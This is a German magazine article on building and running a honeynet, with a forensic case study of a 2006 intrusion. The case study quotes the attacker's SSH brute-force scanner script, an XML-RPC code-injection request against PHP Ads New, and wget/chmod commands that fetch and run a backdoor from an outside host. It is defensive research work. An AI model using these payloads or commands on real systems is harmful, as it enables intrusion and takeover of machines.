© Saniphoto, Fotolia.com
Richtig konfiguriert zu einem Netzwerk zusammengeschlossen täuschen elektronische Köder nicht nur automatisierte Schadprogramme, sondern auch menschliche Angreifer. Der sicherheitsbewusste Admin kann sie beobachten, aufzeichnen und ihre Methoden und Werkzeuge analysieren.
Jeder Admin findet sich über kurz oder lang in der Situation, einen infizierten Rechner zu reinigen. Die einfache Vorgehensweise liegt am nächsten: Festplatte kurzerhand formatieren und das System von einem vermeintlich sauberen Medium neu installieren. Aber wie kam es überhaupt zu der Infektion? Welche Schwachstelle hat der Angreifer ausgenutzt, um Zugang zum System zu erlangen, und zu welchem Zweck hat der Unbefugte den Rechner benutzt?
Natürlich kostet es viel Zeit und Erfahrung, ein infiziertes System zu untersuchen und die Spuren des Angreifers zu verfolgen. Gerade wenn es sich um Produktivsysteme handelt, muss der Admin die Ausfallzeit zur Kostenvermeidung so kurz wie möglich halten. Oft mangelt es ihm auch an der nötigen Erfahrung im Umgang mit infizierten Rechnern: Wo sind die Informationen zu finden, worauf muss er achten und welche Systemwerkzeuge sind noch verlässlich, wenn er auf einem kompromittierten System nach Spuren sucht?
Angreifer anlocken
Präparierte Köder-Systeme oder Honeypots [1] ermöglichen es, erste Erfahrungen mit Angriffen aus dem Internet zu sammeln. Sie täuschen nach außen ein produktives System mit Schwachstellen vor. So laden sie Angreifer dazu ein, das System zu übernehmen. Was die Angreifer nicht wissen: Anders als normale Rechner werden Honeypots genauestens überwacht. Der Honeypot verfügt über spezielle Werkzeuge, die alle ausgeführten Kommandos mitlesen und über das Netzwerk zurück an die so genannte Honeywall senden (Abbildung 1). Die Honeywall verfügt ihrerseits über spezielle Werkzeuge, die der Steuerung und dem Schutz dienen.
Abbildung 1: Das Honeynet aus Admin-Sicht: Die Honeywall ist Zentrum und Schnittstelle zwischen den Honeypots und dem Administrationsnetz. Der Angreifer sieht nur die virtuellen oder realen Honeypots.
Honeypots treten als physische oder virtualisierte Systeme auf. Virtualisierte Hardware hat den Kostenvorteil auf ihrer Seite, außerdem ist der kompromittierte Honeypot für den Administrator schnell neu aufzusetzen. Andererseits identifiziert der Angreifer leicht das virtualisierte System und wendet sich ab. Außerdem würde eine unbekannte Schwachstelle in der Virtualisierungssoftware das Basis-System und alle dort laufenden virtuellen Maschinen angreifbar machen. Um solche ungewollten Kompromittierungen der Honeywall zu verhindern, erhält sie ein eigenes physisches System. Die Auswertung eines Angriffs erfolgt in der Regel retrospektiv. Gängige Werkzeuge wie Wireshark oder TCPdump erlauben, den ein- und ausgehenden Netzwerkverkehr der Honeypots live zu beobachten.
Die Honeypot-Idee lässt sich auf ein Netzwerk von Honeypots ausweiten, das Honeynet. Der Zusammenschluss mehrerer Pots, die mit unterschiedlichen Betriebssystemen und Schwachstellen präpariert sind, erhöht einerseits die Wahrscheinlichkeit, dass jeder Angreifer eine zu ihm passende Schwachstelle findet. Zudem hat der Betreiber die Möglichkeit, das Verhalten der Honeypots auch untereinander zu beobachten. Der Operator eines Honeynet schafft sich ein eigenes Szenario und sammelt Erfahrungen mit Angriffsstrategien und digitaler Forensik, ohne Produktivsysteme zu gefährden.
Wissen, was sie tun
Ein High Interaction Honeynet der dritten Generation (siehe Kasten “Entwicklung der Honigfalle”) braucht zwei getrennte Netzwerke. Im ersten Netz sitzen die einzelnen Honeypots, das zweite dient der Administration des gesamten Honeynet. Einzige Schnittstelle ist die Honeywall, vom Honeynet-Projekt als Roo implementiert [2]. Alle im Honeynet gesammelten Informationen fließen hier zusammen und sind vom Administrationsbereich aus zugänglich. Eine schrittweise Installationsanleitung für die Honeywall Roo stellt das Honeynet-Projekt bereit [3]. Als Zentrale des Honeynet erfüllt die Honeywall die Aufgaben Datenkontrolle, Datenerfassung und Datenanalyse.
Zur Datenkontrolle zählen alle Maßnahmen der Honeywall, um Systeme außerhalb des Honeynet vor Angriffen zu schützen. Dafür verwendet sie das Spezialtool Snort-Inline [4], aber beispielsweise setzt sie auch eine Netfilter-Regel ein, die ausgehende TCP-Verbindungen limitiert. Mehr Details beschreibt der Text “A Primer on Honeynet Data Control Requirements” von Ryan Talabis [5].
| Entwicklung der Honigfalle |
|---|
| 1999 gründete eine Gruppe um den amerikanischen Security-Enthusiasten Lance Spitzner das Honeynet-Projekt, um das Verhalten von Angreifern zu beobachten. Drei Jahre später entstand die weltweite Honeynet Research Alliance. Sie brachte Werkzeuge hervor wie Snort-Inline, ein Signatur-basiertes Extrusion Detection System, das von einem System ausgehende Angriffe unterbindet. Außerdem entwickelte die Honeynet-Allianz den Tracker Sebek, der die Aktivitäten eines Angreifers auf dem Honeypot aufzeichnet und regelmäßig zur Auswertung an die so genannte Honeywall sendet. Als Zentrale des Honeynet realisiert sie Datenkontrolle, Datenerfassung und Datenanalyse. Roo ist die quelloffene Implementierung einer Honeywall. Zusammen legen diese Werkzeuge den Grundstein für ein so genanntes High Interaction Honeynet.
High und Low Interaction Honeynets unterscheiden sich durch den Interaktionsgrad für den Angreifer. Bei der Low Interaction simulieren die Honeypots ihre Verwundbarkeiten nur. Sie erlauben es nicht, die Kontrolle über das System zu erlangen. Somit bedarf es nach einem Angriff keiner aufwändigen Bereinigung des Systems. Allerdings fängt ein solches Honeypot nur sich automatisch verbreitende Schadprogramme ein, da ein Mensch ihn schnell erkennt und sich verabschiedet. Mit Low Interaction Honeynets lassen sich vor allem Angriffe und Angriffsstrategien erkennen. Zum Beispiel bedient sich Intrusion Detection dieser Methode. Hoch interaktivBei den High Interaction Honeypots handelt es sich dagegen um Rechner mit echten Schwachstellen. Diese soll der Angreifer ausnutzen und Kontrolle über den Rechner gewinnen. Der Honeynet-Betreiber kann so das Vorgehen studieren und Informationen über die Werkzeuge sammeln. Den Rest des Netzwerks schützt die Honeywall, die eine Reihe besonderer Kontrollmaßnahmen ermöglicht. Die Entwicklungsstufen der Honeywall Roo heißen Generation I, II und III. Während Roo in der ersten Generation noch als Router den Netzwerkverkehr mit Hilfe von Firewallregeln überwacht und gegebenenfalls unterbindet, arbeitet die zweite Generation bereits als transparente Bridge: Sie verbindet die Rechner im Honeynet mit dem Internet, tritt für den Angreifer aber nicht in Erscheinung und kann folglich nicht Ziel des Angriffs werden. Da der Netzwerkverkehr an der Bridge zusammenläuft, ist sie der ideale Punkt für die Datensammlung. Der Betreiber eines Honeynet greift über eine separate Managementschnittstelle auf die Honeywall zu. Sie enthält bereits Snort-Inline, sodass sie bekannte ausgehende Angriffe verhindert. In der dritten Generation geht Sebek an Bord. Das Programm ersetzt einige Kernelfunktionen und zeichnet mittels API-Hooking sämtliche von einem Angreifer abgesetzten Kommandos auf. So entstehen lückenlose Protokolle über die erfolgreichen Angriffe. |
Sehen, was sie tippen
Als Basis für spätere Angriffsanalysen ist Datenerfassung die Hauptaufgabe der Honeywall. Ihre Werkzeuge sind zum Beispiel das Programm POF (Passive OS Fingerprinting, [6]), das ihren Netzwerkverkehr analysiert und versucht an Hand der gesetzten TCP/IP-Parameter das sendende Betriebssystem zu ermitteln. Der Swatch (Simple Watcher of Logfiles, [7]) untersucht Logdateien der Honeywall auf durch reguläre Ausdrücke spezifizierte Ereignisse und verschickt zum Beispiel eine E-Mail an den Administrator, sobald er verdächtigen Netzwerkverkehr beobachtet. Schließlich sitzt Sebek [8] als Kernelmodul – beziehungsweise Windows-Treiber – tief im Betriebssystem des Honeypot und protokolliert alle von einem Angreifer durchgeführten Operationen, etwa Tastatureingaben oder Datei-Operation (Abbildung 2).
Abbildung 2: Sebek versteckt sich tief im Betriebssystem des Honeypot. Es protokolliert die Operationen des Angreifers und merkt sich zum Beispiel die Tastatureingaben.
Alle gewonnenen Daten legen die Honeypots auf dem Honeywall-System ab. Die komplette Datenerfassung eines Generation-III-Honeynet beschreiben Edward Balas und Camilo Viecco im Rahmen eines Security-Workshops der IEEE an der United States Military Academy [9].
Die Datenanalyse bringt schließlich die unabhängig voneinander gespeicherten Daten in Relation zueinander. Dazu dient das Programm Walleye, eine grafische Schnittstelle zwischen den auf der Honeywall abgelegten Informationen und dem Benutzer. Neben dem generellen Netzwerkverkehr lassen sich hier Details zu den einzelnen Honeypots abfragen (Abbildung 3). Walleye stellt zum Beispiel die Sebek-Daten als Prozessgraph dar und gibt damit einen guten Überblick über die vom Angreifer auf einem Honeypot durchgeführten Aktionen. Walleye exportiert auch Netzwerkverkehrsdaten im Pcap-Format, die sich so in andere Analysewerkzeuge wie Wireshark importieren lassen. Schließlich dient Walleye auch zur nachträglichen Konfiguration der Honeywall.
Was die genannten Honeypot-Komponenten verraten, illustriert ein aufgezeichneter Einbruch aus dem Jahr 2006.
Abbildung 3: Die grafische Benutzerschnittstelle Walleye zeigt hier den eingehenden und den ausgehenden Netzwerkverkehr des Honeynet sowie die Anzahl der Einbruchswarnungen an.
Großes Kino
Auf einem nicht aktualisierten Red Hat Linux 8 des Jahres 2002 laufen ein Apache-Webserver und die als verwundbar geltende Software PHP Ads New [10]. Ihre bekannte Schwachstelle ist die XML-RPC-Bibliothek von PHP [11], die dem Angreifer ermöglicht, Befehle mit den Rechten des Webservers auf dem Honeypot auszuführen. Sie betrifft die PHP-Ads-New-Versionen bis 2.0.5.
Um zu vermeiden, dass die IP-Adressen der Fallen allgemein bekannt werden, wechseln sie nach einiger Zeit. Zum Zeitpunkt des Angriffes besitzt der Honeypot eine IP-Adresse aus dem Bereich 192.35.0.0/16. Die auf der Honeywall aufgezeichneten IPs in den Logdaten zeigen, dass der Eindringling von vier Rechnern aus angreift. Es ist jedoch davon auszugehen, dass der Angreifer über gekaperte Rechner agiert.
Es gelingt der Software POF trotz passiver Analyse des Netzwerkverkehrs nicht, herauszufinden, welche Betriebssysteme auf den Rechnern des Angreifers laufen: Die Parameter der Netzwerkpakete sind zu allgemein für die exakte Zuordnung zu einem Betriebssystem. Der Benutzername des Eindringlings scheint Methadon zu sein, da er später einen SSH-Schlüssel dieses Benutzers auf dem Honeypot ablegt. Auch der Autor einiger Programme (Listing 1), die der Angreifer auf den Honeypot kopiert, nennt sich so.
| Listing 1: Schwachstellen-Scanner des Angreifers |
|---|
01 #!/bin/bash 02 # 03 # by MethadoN 04 # 05 06 if [ $# != 1 ]; then 07 echo " usage: $0 <b class>" 08 exit; 09 fi 10 11 rm -rf scan.log 12 clear 13 rm -rf 0 1 2 3 4 5 gen-pass.sh secure screen scan 14 echo -e "33[1;36m#-~-=- BruTeSSH Scanner -=-~-#" 15 echo -e "#-~-=- Original by #eNable Team -=-~-#" 16 echo -e "33[1;37m#-~-=- Do NOT share this shit -=-~-#33[1;31m" 17 sleep 1 18 ././pscan2 $1 22 19 echo -e "33[1;36m#-~-=- BRUTEFORCE STARTED -=-~-#33[0m" 20 echo -e "33[1;36m#-~-=- Gr33tz to MethadoN ;) -=-~-#33[0m" 21 echo -e "33[1;36m#-~-=- Users NO.1 -=-~-#33[0m" 22 cp 0 pass.txt 23 ./sshd 100 24 sleep 5 25 echo -e "33[1;36m#-~-=- Users NO.2 -=-~-#33[0m" 26 cp 1 pass.txt 27 ... 28 ./sshd 100 29 echo -e "33[1;36m#-~-=- Party Over, Try Again :-) -=-~-#33[0m" |
Am 7. Mai kurz nach 15 Uhr startet der Angriff (Tabelle 1). Zunächst versucht der Angreifer eine zu diesem Zeitpunkt als verwundbar geltende Webanwendung auf dem Honeypot ausfindig zu machen. Dazu will er mit unterschiedlichen URLs die Datei »xmlrpc.php« öffnen und über zusätzliche Parameter Kommandos auf dem System ausführen. Nach knapp zwei Minuten ist die passende URL für PHP Ads New gefunden. Ein POST-Request der Art
<?xml version="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>',''));echo '_begin_n';echo `uname -a`;echo '_end_';exit;/*</name></value></param></params></methodCall>
liefert dem Angreifer zum Beispiel die Kernelversion des Betriebssystems. Das unautorisierte Ausführen des Systemkommandos »uname -a« ist bereits als erfolgreicher Angriff zu werten. Nun kann er passende Exploits ausführen.
Der Eindringling installiert jetzt verschiedene Skripte auf dem Honeypot. Es gelingt ihm, mit Hilfe eines lokal ausgeführten Exploit seine Rechte auf Root zu erweitern (20.51 Uhr). Damit hat er volle Kontrolle über das System. Mit einem passenden Exploit installiert er mehrere SSH-Scanner, einen Scanner zum Aufspüren von verwundbaren PHP-Anwendungen und ein Rootkit mit Hintertür. Mit Hilfe des Schwachstellen-Scanners installiert er eine in Perl verfasste Hintertür mit dem Namen “Data ChaOS Connect Back Backdoor”, die ihm die Interaktion mit dem kompromittierten System erleichtert.
| Tabelle 1: Zeitlicher Verlauf des Angriffs |
|
|---|---|
| Uhrzeit | Aktion |
| 7. Mai 2006 | |
| 15:06:45 | Der Angreifer verbindet sich zum ersten Mal von der IP Adresse 72.29.xxx.xxx (Florida) zum Honeypot. Er probiert mehrere URLs verwundbarer PHP-Anwendungen. Alle verweisen auf eine Datei namens »xmlrpc.php«. |
| 15:08:12 | Der Angreifer setzt das Kommando »uname -a« über die PHP-Schwachstelle mit einem POST-Request auf dem Honeypot ab. |
| 20:50:40 | Der Angreifer lädt die Datei »s.txt« auf den Honeypot. In dieser Datei befindet sich das Perl-Skript “Data Cha0s Connect Back Backdoor”. Es erlaubt Zugriff auf den Honeypot mit den Rechten des Webservers. |
| 20:51:01 | Die Datei »root.tar.gz« mit Exploits für Red Hat Linux wandert auf den Honeypot. Nach 30 Sekunden ist der Honeypot unter der Kontrolle von Methadon. Er nutzte die Kernel-Schwachstelle »ptrace« [12]. |
| 20:51:32 | Das in der Datei »shv5.tar.gz« enthaltene Rootkit überschreibt mehrere Systemdateien und öffnet eine Hintertür auf Port 1400. |
| 20:52:32 | Der Rechner mit der IP-Adresse 86.107.xxx.xxx (Rumänien) verbindet sich zur Hintertür auf Port 1400. |
| 21:38:23 | Der Rechner mit der IP-Adresse 81.181.xxx.xxx (ebenfalls Rumänien) verbindet sich zur Hintertür auf Port 1400. |
| 21:48:49 | Der Angreifer kopiert seinen SSH-Schlüssel auf dem Honeypot. |
| 21:49:26 | Ein Login per SSH erfolgt von dem Rechner mit der IP 81.181.xxx.xxx. In den folgenden Minuten installiert der Angreifer eine Paypal-Phishing-Seite auf dem Webserver des Honeypot. Obwohl die Seite funktioniert, entfernt er sie kurze Zeit später wieder. |
| 8. Mai 2006 | |
| 00:36:29 | Die Datei »ioi« erscheint auf dem Honeypot. Sie enthält mehrere SSH-Scanner, um Rechner mit schwachen Passwörtern aufzuspüren. |
| 00:37:47 | Der Angreifer attackiert den SSH-Dienst im gesamten lokalen Netz 192.35.0.0/16 sowie in einem amerikanischen Netz mit den Adressen aus 66.252.0.0/16. |
| 13:32:41 | Login vom Rechner mit der IP-Adresse 81.181.xxx.xxx und Herunterladen der Datei »udp.txt«. Dieses Perl-Skript will den Zielrechner mit vielen UDP-Paketen in die Knie zwingen (Denial of Service). Mit dem Skript macht sich der Angreifer über den Rechner einer Webhosting-Firma her. |
| 23:16:53 | Login durch die Hintertür des Rootkits auf dem rumänischen Rechner 81.181.xxx.xxx und Herunterladen der Datei »udp.pl«. Es ist das gleiche Skript wie wenige Stunden zuvor. |
| 10. Mai 2006 | |
| 23:27:16 | Durch die Hintertür des Rootkits vom Rechner mit der IP Adresse 86.107.xxx.xxx lädt der Angreifer die Datei »alexu.jpg« herunter. Sie enthält einen weiteren SSH-Scanner mit einer Passwortliste, die mehr als 12000 Einträge enthält. |
| 23:30:35 | Angriff auf den SSH-Dienst der Rechner aus den Netzen 24.3.0.0/16 und 66.98.0.0/16. |
| 23:37:19 | Der Angreifer lädt die Datei »cola.tar« auf den Honeypot. Sie enthält einen Scanner für verwundbare PHP-Anwendungen. |
| 11. Mai 2006 | |
| 00:08:49 | Der unermüdliche Angreifer sucht mehrere Rechner aus anderen Netzen nach verwundbaren PHP-Anwendungen ab, um dort wieder die XML-RPC-Schwachstelle auszunutzen und Kommandos abzusetzen. In nicht einmal zwei Minuten hat er sechs weitere Rechner im Internet übernommen. |
Über eine zweite Hintertür des Rootkits SHv5 auf Port 1400 (Abbildung 4) kann der Angreifer sich ab sofort auch ohne den lokalen Exploit jederzeit unbemerkt als Root am System anmelden. Obwohl die Hintertür auf Port 1400 installiert ist, laufen viele Verbindungen des Angreifers über den regulären SSH-Dienst. Die Hintertür dient ihm also nur als Notfall-Lösung, um jederzeit erneut Zugriff auf das System zu erlangen, wenn der Admin den SSH-Zugang sperren sollte. Solange der reguläre SSH-Zugang funktioniert, gibt es jedoch keinen Anlass, die Hintertür zu verraten. Mittels SHv5 tauscht der Einbrecher auch Systemprogramme gegen modifizierte Versionen, um seine Spuren zu verwischen. Beispielsweise zeigt »ls« die Dateien des Rootkits nicht an. Da viele der Programme, die der Angreifer auf dem Honeypot installiert, speziell auf Red Hat Linux zugeschnitten sind, war der Angriff vermutlich gut geplant.
Abbildung 4: Dieses SHv5-Rootkit hat der Angreifer auf dem Honeypot installiert, nachdem er mit Hilfe der Abfrage von Systeminformationen lokale Schwachstellen ausfindig machte.
Finale mit Hindernissen
Kurzzeitig sammelt der Angreifer Paypal-Benutzernamen und -Passwörter über eine Phishingseite ein (21.49 Uhr). Warum er sie nur kurzfristig aufsetzt, ist nicht nachvollziehbar. Der Einbrecher startet von dem übernommenen Honeypot aus weitere Angriffe im lokalen Netzwerk und in das Internet. Snort-Inline filtert Angriffe, für die bereits eine Signatur existiert. Der hier beschriebene Angreifer verwendet jedoch das reguläre HTTP-Protokoll, um weitere Rechner zu attackieren. Das ist schlecht zu verhindern, denn ein gesperrtes HTTP an der Honeywall hätte zur Folge, dass der Angreifer seine Werkzeuge nicht herunterladen kann. Auch ausgehende SSH-Verbindungen blockiert die Honeywall nicht, um dem Angreifer zu ermöglichen, auf den Honeypot zuzugreifen.
Allerdings unterbinden die Firewallregeln mit Hilfe eines Rate-Limits ausgehende Denial-of-Service-Angriffe. In der Standardkonfiguration erlaubt die Honeywall nur 15 ausgehende TCP- und 20 UDP-Verbindungen pro Tag. Somit schlägt der Versuch des Angreifers fehl, von dem gekaperten Honeypot aus den Server eines Webhosters in die Knie zu zwingen (2. Tag, 13.30 Uhr). Nachdem der Angreifer das festgestellt hat, scheint er einen Fehler in seiner UDP-Software zu vermuten, denn er lädt sie von einer anderen Quelle erneut herunter.
Um weitere Maschinen zu übernehmen, startet er auf ihnen die Kommandos »wget 208.25.xxx.xxx:443/bind.jpg«, »tar xzvf bind.jpg«, »chmod a+x httpd« und »./httpd« (3. Tag, 0.00 Uhr). Sie zielen auf die Installation einer mit den Rechten des Webservers laufenden Hintertür. In weniger als zwei Minuten hat der Angreifer sechs Rechner im Internet auf diese Weise übernommen. An dieser Stelle schalten die Autoren den Honeypot ab, um Schaden zu verhindern, und informieren alle betroffenen Administratoren.
Spuren analysieren
Für die Analyse nimmt der Admin die Honeypot-Rechner vom Netz und bindet deren kompromittierte Festplatten auf einem anderen Rechner ein. Dieser Schritt legt die Rootkits lahm, da die Systemprogramme der eingebundenen Festplatte nicht zum Einsatz kommen. Einige Vorsichtsmaßnahmen erhöhen noch den Wert der Analyse. Die von der Honeywall aufgezeichneten Logdaten, von wo der Angreifer welche Software auf das System lädt, sind nicht unbedingt vertrauenswürdig. Der Administrator sollte darum auch auf dem Honeypot selbst danach suchen. Außerdem versteckt sich zwar die Überwachungssoftware auf dem Honeypot vor dem Angreifer, aber falls er zum Beispiel den Netzwerkverkehr verschlüsselt, gehen Informationen verloren. Darum ist es nötig, die Aktivitäten des Angreifers zu verfolgen, um Gegenmaßnahmen zeitnah einzuleiten.
Auf dem kompromittierten Honeypot lassen sich Veränderungen am Dateisystem feststellen. Forensische Methoden [13] erlauben gelöschte Logdateien und Schadprogramme wiederherzustellen. Man erkennt damit, wie ein Angreifer seine Anwesenheit auf dem Rechner und die Veränderungen am Dateisystem zu verbergen sucht. Im beschriebenen Fall förderten die aufgespürten Logdateien des Schwachstellen-Scanners für Webanwendungen schließlich auch alle IP-Adressen zu Tage, die der Angreifer von dem Honeypot aus anvisiert hat.
Vorsicht ist geboten
Einbruchsstudien mittels Honeypots sind lehrreich und helfen vorbeugen. Rechtlich bewegt sich der Honeynet-Betreiber jedoch in einer Grauzone. Aus dem deutschen Recht sind mindestens drei Sachverhalte zu beachten: Beihilfe zu einer Straftat, Datenschutz sowie Haftung für den mittelbar durch einen Honeypot verursachten Schaden.
Die Beihilfe zur Straftat kommt laut einem juristischen Konferenzvortrag [14] nicht zum Tragen, wenn das Honeynet durch geeignete Sicherheitsmaßnahmen abgesichert ist. Meistens ist das Honeynet sogar deutlich sicherer als normale Rechner. Im zweiten Fall geht es um die Frage, ob man aus Datenschutzgründen überhaupt die Aktivitäten auf einem Honeypot aufzeichnen darf. Diese Frage erübrigt sich allerdings, da auch im realen Leben Überwachungssysteme Einbrecher aufzeichnen.
Für die Haftung gibt es keine eindeutige Antwort. Es bleibt, das Honeynet bestmöglich abzusichern, um Schaden abzuwenden. Der Betrieb eines Honeynet ist nichts, was man mal eben nebenbei tut. Der Betreiber muss schon rund um die Uhr hinschauen, um rechtzeitig eingreifen zu können. (ake)
| Infos |
|---|
| [1] Siehe auch folgenden Honeypot-Artikel: Frank Bernhard, “Süße Versuchung – Angriffe auf nicht vorhandene IP-Adressen”: Linux-Magazin 01/2002, S. 68
[2] Roo:[https://projects.honeynet.org/honeywall] [3] Honeynet Project, “Roo CDROM User\’s Manual”:[http://yum.honeynet.org/roo/manual] [4] Snort-Inline:[http://snort-inline.sourceforge.net] [5] Ryan Talabis, “A Primer on Honeynet Data Control Requirements”:[http://www.philippinehoneynet.org] [6] POF:[http://lcamtuf.coredump.cx/p0f.shtml] [7] Swatch: [http://swatch.sourceforge.net] [8] Sebek:[http://www.honeynet.org/tools/sebek] [9] Edward Balas and Camilo Viecco, “Towards a Third Generation Data Capture Architecture for Honeynets”:[http://old.honeynet.org/papers/individual/hflow.pdf] [10] PHP Ads New:[http://www.openx.org/phpadsnew] [11] PHP-Schwachstelle XMLRPC:[http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-2498] [12] Kernel-Schwachstelle Ptrace: [http://www.csnc.ch/misc/files/publications/Linux_PTrace_Root_Compromize.pdf] [13] Forensik-Schwerpunkt im Linux-Magazin 06/2008: [https://www.linux-magazin.de/heft_abo/ausgaben/2008/06] [14] Maximilian Dornseif, Felix Freiling, Thorsten Holz, “Ermittlung von Verwundbarkeiten mit elektronischen Ködern”:[http://arxiv.org/pdf/cs/0406059] |
| Die Autoren |
|---|
| Markus Engelberth, Jan Göbel, Christian Gorecki und Philipp Trinius sind Doktoranden am Lehrstuhl für Praktische Informatik 1 der Universität Mannheim. Neben Honeypots gehören Spam-Mitigation, Botnet-Tracking und Malware-Analyse zu den Schwerpunkten des Lehrstuhls. |
